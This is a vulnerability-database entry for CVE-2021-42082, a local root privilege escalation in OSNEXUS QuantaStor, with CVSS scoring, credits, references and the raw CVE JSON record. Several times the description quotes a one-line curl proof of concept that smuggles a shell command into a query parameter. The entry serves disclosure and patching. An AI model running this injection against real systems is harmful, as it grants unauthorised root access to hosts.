CVE-2021-42082 (GCVE-0-2021-42082)

Vulnerability from cvelistv5 – Published: 2023-07-10 06:29 – Updated: 2025-09-22 06:40
VLAI?
Title
Local Privilege Escalation to root in OSNEXUS QuantaStor before 6.0.0.355
Summary
Local users are able to execute scripts under root privileges. POC On the local host run the following command: curl 'localhost:8154/qstor/qs_upgrade.py?taskId=1&a=;`whoami`'
Severity ?
7.8 (High)
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE
  • CWE-269 - Improper Privilege Management
Assigner
References
https://www.wbsec.nl/osnexus third-party-advisorytechnical-descriptionexploit
https://csirt.divd.nl/DIVD-2021-00020/ third-party-advisory
https://www.osnexus.com/products/software-defined… product
https://csirt.divd.nl/CVE-2021-42082 third-party-advisorytechnical-descriptionexploit
Impacted products
Vendor Product Version
OSNEXUS QuantaStor Affected: 0 , < 6.0.0.355 (semver)
Create a notification for this product.
Credits
Wietse Boonstra (DIVD) Frank Breedijk (DIVD) Victor Pasman (DIVD) Victor Gevers (DIVD) Max van der Horst (DIVD) Célistine Oosting (DIVD)
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T03:22:25.967Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "third-party-advisory",
              "x_transferred"
            ],
            "url": "https://www.wbsec.nl/osnexus"
          },
          {
            "tags": [
              "third-party-advisory",
              "x_transferred"
            ],
            "url": "https://www.divd.nl/DIVD-2021-00020"
          },
          {
            "tags": [
              "product",
              "x_transferred"
            ],
            "url": "https://www.osnexus.com/products/software-defined-storage"
          },
          {
            "tags": [
              "third-party-advisory",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/CVE-2021-42082"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2021-42082",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-11-12T14:16:04.030763Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-12T14:16:12.694Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://www.osnexus.com/downloads",
          "defaultStatus": "unknown",
          "platforms": [
            "Windows",
            "Linux"
          ],
          "product": "QuantaStor",
          "vendor": "OSNEXUS",
          "versions": [
            {
              "lessThan": "6.0.0.355",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Wietse Boonstra (DIVD)"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "Frank Breedijk (DIVD)"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "Victor Pasman (DIVD)"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "Victor Gevers (DIVD)"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "Max van der Horst (DIVD)"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "C\u00e9listine Oosting (DIVD)"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "Local users are able to execute scripts under root privileges.\u003cbr\u003e\u003cbr\u003ePOC\u003cbr\u003e\u003cbr\u003eOn the local host run the following command:\u003cbr\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003ecurl \u0027localhost:8154/qstor/qs_upgrade.py?taskId=1\u0026amp;a=;`whoami`\u0027\u003c/span\u003e\u003cbr\u003e"
            }
          ],
          "value": "Local users are able to execute scripts under root privileges.\n\nPOC\n\nOn the local host run the following command:\n\ncurl \u0027localhost:8154/qstor/qs_upgrade.py?taskId=1\u0026a=;`whoami`\u0027"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-269",
              "description": "CWE-269 Improper Privilege Management",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-09-22T06:40:10.543Z",
        "orgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
        "shortName": "DIVD"
      },
      "references": [
        {
          "tags": [
            "third-party-advisory",
            "technical-description",
            "exploit"
          ],
          "url": "https://www.wbsec.nl/osnexus"
        },
        {
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://csirt.divd.nl/DIVD-2021-00020/"
        },
        {
          "tags": [
            "product"
          ],
          "url": "https://www.osnexus.com/products/software-defined-storage"
        },
        {
          "tags": [
            "third-party-advisory",
            "technical-description",
            "exploit"
          ],
          "url": "https://csirt.divd.nl/CVE-2021-42082"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "Upgrade to the latest version of OSNEXUS QuantaStor."
            }
          ],
          "value": "Upgrade to the latest version of OSNEXUS QuantaStor."
        }
      ],
      "source": {
        "discovery": "INTERNAL"
      },
      "title": "Local Privilege Escalation to root in OSNEXUS QuantaStor before 6.0.0.355",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
    "assignerShortName": "DIVD",
    "cveId": "CVE-2021-42082",
    "datePublished": "2023-07-10T06:29:47.984Z",
    "dateReserved": "2021-10-07T17:12:57.678Z",
    "dateUpdated": "2025-09-22T06:40:10.543Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2021-42082",
      "date": "2026-04-26",
      "epss": "0.00038",
      "percentile": "0.11183"
    },
    "fkie_nvd": {
      "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:osnexus:quantastor:*:*:*:*:*:*:*:*\", \"versionEndExcluding\": \"6.0.0.355\", \"matchCriteriaId\": \"5E101217-36C7-4C28-8C61-7744481D2D0E\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"Local users are able to execute scripts under root privileges.\"}]",
      "id": "CVE-2021-42082",
      "lastModified": "2024-11-21T06:27:12.987",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"csirt@divd.nl\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 7.8, \"baseSeverity\": \"HIGH\", \"attackVector\": \"LOCAL\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"LOW\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 1.8, \"impactScore\": 5.9}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 7.8, \"baseSeverity\": \"HIGH\", \"attackVector\": \"LOCAL\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"LOW\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 1.8, \"impactScore\": 5.9}]}",
      "published": "2023-07-10T16:15:47.637",
      "references": "[{\"url\": \"https://csirt.divd.nl/CVE-2021-42082\", \"source\": \"csirt@divd.nl\", \"tags\": [\"Third Party Advisory\"]}, {\"url\": \"https://csirt.divd.nl/DIVD-2021-00020/\", \"source\": \"csirt@divd.nl\"}, {\"url\": \"https://www.osnexus.com/products/software-defined-storage\", \"source\": \"csirt@divd.nl\", \"tags\": [\"Product\"]}, {\"url\": \"https://www.wbsec.nl/osnexus\", \"source\": \"csirt@divd.nl\", \"tags\": [\"Third Party Advisory\"]}, {\"url\": \"https://csirt.divd.nl/CVE-2021-42082\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Third Party Advisory\"]}, {\"url\": \"https://www.divd.nl/DIVD-2021-00020\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"https://www.osnexus.com/products/software-defined-storage\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Product\"]}, {\"url\": \"https://www.wbsec.nl/osnexus\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Third Party Advisory\"]}]",
      "sourceIdentifier": "csirt@divd.nl",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"csirt@divd.nl\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-269\"}]}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-269\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2021-42082\",\"sourceIdentifier\":\"csirt@divd.nl\",\"published\":\"2023-07-10T16:15:47.637\",\"lastModified\":\"2025-09-22T07:15:39.840\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Local users are able to execute scripts under root privileges.\\n\\nPOC\\n\\nOn the local host run the following command:\\n\\ncurl \u0027localhost:8154/qstor/qs_upgrade.py?taskId=1\u0026a=;`whoami`\u0027\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"csirt@divd.nl\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"csirt@divd.nl\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-269\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-269\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:osnexus:quantastor:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"6.0.0.355\",\"matchCriteriaId\":\"5E101217-36C7-4C28-8C61-7744481D2D0E\"}]}]}],\"references\":[{\"url\":\"https://csirt.divd.nl/CVE-2021-42082\",\"source\":\"csirt@divd.nl\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://csirt.divd.nl/DIVD-2021-00020/\",\"source\":\"csirt@divd.nl\"},{\"url\":\"https://www.osnexus.com/products/software-defined-storage\",\"source\":\"csirt@divd.nl\",\"tags\":[\"Product\"]},{\"url\":\"https://www.wbsec.nl/osnexus\",\"source\":\"csirt@divd.nl\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://csirt.divd.nl/CVE-2021-42082\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://www.divd.nl/DIVD-2021-00020\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://www.osnexus.com/products/software-defined-storage\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Product\"]},{\"url\":\"https://www.wbsec.nl/osnexus\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://www.wbsec.nl/osnexus\", \"tags\": [\"third-party-advisory\", \"x_transferred\"]}, {\"url\": \"https://www.divd.nl/DIVD-2021-00020\", \"tags\": [\"third-party-advisory\", \"x_transferred\"]}, {\"url\": \"https://www.osnexus.com/products/software-defined-storage\", \"tags\": [\"product\", \"x_transferred\"]}, {\"url\": \"https://csirt.divd.nl/CVE-2021-42082\", \"tags\": [\"third-party-advisory\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-04T03:22:25.967Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2021-42082\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-11-12T14:16:04.030763Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-11-12T14:16:08.145Z\"}}], \"cna\": {\"title\": \"Local Privilege Escalation to root in OSNEXUS QuantaStor before 6.0.0.355\", \"source\": {\"discovery\": \"INTERNAL\"}, \"credits\": [{\"lang\": \"en\", \"type\": \"finder\", \"user\": \"00000000-0000-4000-9000-000000000000\", \"value\": \"Wietse Boonstra (DIVD)\"}, {\"lang\": \"en\", \"type\": \"analyst\", \"value\": \"Frank Breedijk (DIVD)\"}, {\"lang\": \"en\", \"type\": \"analyst\", \"value\": \"Victor Pasman (DIVD)\"}, {\"lang\": \"en\", \"type\": \"analyst\", \"value\": \"Victor Gevers (DIVD)\"}, {\"lang\": \"en\", \"type\": \"analyst\", \"value\": \"Max van der Horst (DIVD)\"}, {\"lang\": \"en\", \"type\": \"analyst\", \"value\": \"C\\u00e9listine Oosting (DIVD)\"}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.8, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"vendor\": \"OSNEXUS\", \"product\": \"QuantaStor\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"6.0.0.355\", \"versionType\": \"semver\"}], \"platforms\": [\"Windows\", \"Linux\"], \"collectionURL\": \"https://www.osnexus.com/downloads\", \"defaultStatus\": \"unknown\"}], \"solutions\": [{\"lang\": \"en\", \"value\": \"Upgrade to the latest version of OSNEXUS QuantaStor.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"Upgrade to the latest version of OSNEXUS QuantaStor.\", \"base64\": false}]}], \"references\": [{\"url\": \"https://www.wbsec.nl/osnexus\", \"tags\": [\"third-party-advisory\", \"technical-description\", \"exploit\"]}, {\"url\": \"https://csirt.divd.nl/DIVD-2021-00020/\", \"tags\": [\"third-party-advisory\"]}, {\"url\": \"https://www.osnexus.com/products/software-defined-storage\", \"tags\": [\"product\"]}, {\"url\": \"https://csirt.divd.nl/CVE-2021-42082\", \"tags\": [\"third-party-advisory\", \"technical-description\", \"exploit\"]}], \"x_generator\": {\"engine\": \"Vulnogram 0.1.0-dev\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Local users are able to execute scripts under root privileges.\\n\\nPOC\\n\\nOn the local host run the following command:\\n\\ncurl \u0027localhost:8154/qstor/qs_upgrade.py?taskId=1\u0026a=;`whoami`\u0027\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"Local users are able to execute scripts under root privileges.\u003cbr\u003e\u003cbr\u003ePOC\u003cbr\u003e\u003cbr\u003eOn the local host run the following command:\u003cbr\u003e\u003cbr\u003e\u003cspan style=\\\"background-color: rgba(29, 28, 29, 0.04);\\\"\u003ecurl \u0027localhost:8154/qstor/qs_upgrade.py?taskId=1\u0026amp;a=;`whoami`\u0027\u003c/span\u003e\u003cbr\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-269\", \"description\": \"CWE-269 Improper Privilege Management\"}]}], \"providerMetadata\": {\"orgId\": \"b87402ff-ae37-4194-9dae-31abdbd6f217\", \"shortName\": \"DIVD\", \"dateUpdated\": \"2025-09-22T06:40:10.543Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2021-42082\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-09-22T06:40:10.543Z\", \"dateReserved\": \"2021-10-07T17:12:57.678Z\", \"assignerOrgId\": \"b87402ff-ae37-4194-9dae-31abdbd6f217\", \"datePublished\": \"2023-07-10T06:29:47.984Z\", \"assignerShortName\": \"DIVD\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.